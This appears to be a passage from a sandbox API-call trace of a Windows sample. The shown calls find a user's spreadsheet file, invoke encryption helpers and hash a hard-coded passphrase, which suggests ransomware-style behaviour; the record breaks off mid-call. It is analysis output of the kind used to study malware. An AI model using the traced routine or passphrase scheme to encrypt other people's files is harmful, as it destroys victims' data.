[0079.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0079.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0079.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.513] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a40c8 | out: hHeap=0x1780000) returned 1 [0079.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.514] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0079.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.515] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0079.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0079.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0079.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.516] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0079.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e310 | out: hHeap=0x1780000) returned 1 [0079.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0079.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0079.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0079.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0079.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0079.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0079.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0079.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.519] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca6e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0079.519] CloseHandle (hObject=0x298) returned 1 [0079.520] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.520] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0079.520] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IWVSvvMxlOfdD1.ods", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2966e570, ftCreationTime.dwHighDateTime=0x1d5e391, ftLastAccessTime.dwLowDateTime=0xb4e09380, ftLastAccessTime.dwHighDateTime=0x1d5edc3, ftLastWriteTime.dwLowDateTime=0xb4e09380, ftLastWriteTime.dwHighDateTime=0x1d5edc3, nFileSizeHigh=0x0, nFileSizeLow=0x13f79, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="IWVSvvMxlOfdD1.ods", cAlternateFileName="IWVSVV~1.ODS")) returned 0x41ac740 [0079.520] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0079.520] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.520] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.520] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0079.523] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.523] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0079.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0079.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0079.524] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a4728) returned 1 [0079.529] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0079.529] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.529] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0079.529] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.529] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.529] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.529] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.529] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.529] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cacd0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0079.530] CryptCreateHash (in: hProv=0x41a4728, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0079.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.530] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0079.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.530] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.530] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0079.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cae08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0079.530] CryptHashData (hHash=0x41abfc0, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0079.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0079.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0079.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0079.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0079.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0079.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0079.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0079.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0079.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 